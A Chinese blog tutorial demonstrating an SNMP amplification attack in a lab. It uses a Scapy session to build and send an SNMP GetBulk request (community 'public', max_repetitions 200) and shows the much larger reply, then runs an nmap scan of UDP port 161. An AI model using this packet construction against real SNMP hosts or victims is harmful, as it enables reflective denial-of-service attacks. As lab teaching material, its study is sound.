• SNMP放大攻击


    SNMP放大攻击

    相关Scapy构造数据包

    定义IP包

    >>> i=IP()
    >>> i.dst="192.168.180.134"
    >>> i.display()

    ###[ IP ]###
    version= 4
    ihl= None
    tos= 0x0
    len= None
    id= 1
    flags=
    frag= 0
    ttl= 64
    proto= hopopt
    chksum= None
    src= 192.168.180.131
    dst= 192.168.180.134
    options

    ---------------------------------------------------------

    定义UDP包

    >>> u=UDP()
    >>> u.dport=161
    >>> u.sport=161
    >>> u.display()
    ###[ UDP ]###
    sport= snmp
    dport= snmp
    len= None
    chksum= None

    ----------------------------------------------------------

    定义SNMP包

    >>> s=SNMP()
    >>> s.community="public"
    >>> s.display()
    ###[ SNMP ]###
    version= 'v2c' 0x1 <ASN1_INTEGER[1]>
    community= 'public'
    PDU
    |###[ SNMPget ]###
    | id= 0x0 <ASN1_INTEGER[0]>
    | error= 'no_error' 0x0 <ASN1_INTEGER[0]>
    | error_index= 0x0 <ASN1_INTEGER[0]>
    | varbindlist

    ----------------------------------------------------------

    定义SNMP的bulk

    b=SNMPbulk()
    b.display()
    b.max_repetitions = 200
    s.PDU=b
    b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
    s.display()
    r=(i/u/s)
    r.display()
    sr1(r)


    >>> b=SNMPbulk()
    >>> b.display()
    ###[ SNMPbulk ]###
    id= 0x0 <ASN1_INTEGER[0]>
    non_repeaters= 0x0 <ASN1_INTEGER[0]>
    max_repetitions= 0x0 <ASN1_INTEGER[0]>
    varbindlist

    >>> b.max_repetitions=200
    >>> b.display()
    ###[ SNMPbulk ]###
    id= 0x0 <ASN1_INTEGER[0]>
    non_repeaters= 0x0 <ASN1_INTEGER[0]>
    max_repetitions= 200
    varbindlist

    >>> s.PDU=b
    >>> s.display()
    ###[ SNMP ]###
    version= 'v2c' 0x1 <ASN1_INTEGER[1]>
    community= 'public'
    PDU
    |###[ SNMPbulk ]###
    | id= 0x0 <ASN1_INTEGER[0]>
    | non_repeaters= 0x0 <ASN1_INTEGER[0]>
    | max_repetitions= 200
    | varbindlist

    >>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
    >>> s.display()
    ###[ SNMP ]###
    version= 'v2c' 0x1 <ASN1_INTEGER[1]>
    community= 'public'
    PDU
    |###[ SNMPbulk ]###
    | id= 0x0 <ASN1_INTEGER[0]>
    | non_repeaters= 0x0 <ASN1_INTEGER[0]>
    | max_repetitions= 200
    | varbindlist
    | |###[ SNMPvarbind ]###
    | | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
    | | value= <ASN1_NULL[0]>
    | |###[ SNMPvarbind ]###
    | | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
    | | value= <ASN1_NULL[0]>

    >>> r=(i/u/s)
    >>> r.display()
    ###[ IP ]###
    version= 4
    ihl= None
    tos= 0x0
    len= None
    id= 1
    flags=
    frag= 0
    ttl= 64
    proto= udp
    chksum= None
    src= 192.168.180.131
    dst= 192.168.180.134
    options
    ###[ UDP ]###
    sport= snmp
    dport= snmp
    len= None
    chksum= None
    ###[ SNMP ]###
    version= 'v2c' 0x1 <ASN1_INTEGER[1]>
    community= 'public'
    PDU
    |###[ SNMPbulk ]###
    | id= 0x0 <ASN1_INTEGER[0]>
    | non_repeaters= 0x0 <ASN1_INTEGER[0]>
    | max_repetitions= 200
    | varbindlist
    | |###[ SNMPvarbind ]###
    | | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
    | | value= <ASN1_NULL[0]>
    | |###[ SNMPvarbind ]###
    | | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
    | | value= <ASN1_NULL[0]>

    ------------------------------------------------------------
    发送snmp包

    >>> sr1(r)
    Begin emission:
    Finished sending 1 packets.
    .*
    Received 2 packets, got 1 answers, remaining 0 packets
    <IP version=4 ihl=5 tos=0x0 len=1500 id=360 flags=MF frag=0 ttl=128 proto=udp chksum=0x294e src=192.168.180.134 dst=192.168.180.131 |<UDP sport=snmp dport=snmp len=8915 chksum=0xa39d |<Raw load='0x82"xc7x02x01x01x04x06publicxa2x82"xb8x02x01x00x02x01x00x02x01x000x82"xab0x81x8ax06x08+x06x01x02x01x01x01x00x04~Hardware: x86 Family 6 Model 158 Stepping 13 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)0x10x06 .........

    探测
    nmap -sU -p161 192.168.180.134


    参考:
    http://wmsbc.xyz/views/2020/DDOS%E5%8E%9F%E7%90%86%E4%B8%8E%E9%98%B2%E5%BE%A1.html
    http://drops.xmd5.com/static/drops/tips-2106.html
    https://www.jianshu.com/p/a9c48cc6985d
    https://blog.csdn.net/Jack0610/article/details/88690365

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    webform单选、复选
    webform下拉列表、列表框
    webform文本框 、显示文字、按钮、跳转页面、页面传值
    sol函数初级查询,去重、分组、排序
    sql基础
    递归
    函数有多个返回值
    Hibernate (开放源代码的对象关系映射框架)介绍
    extjs介绍
    easyui介绍
  • 原文地址:https://www.cnblogs.com/autopwn/p/14693411.html
Copyright © 2020-2023  润新知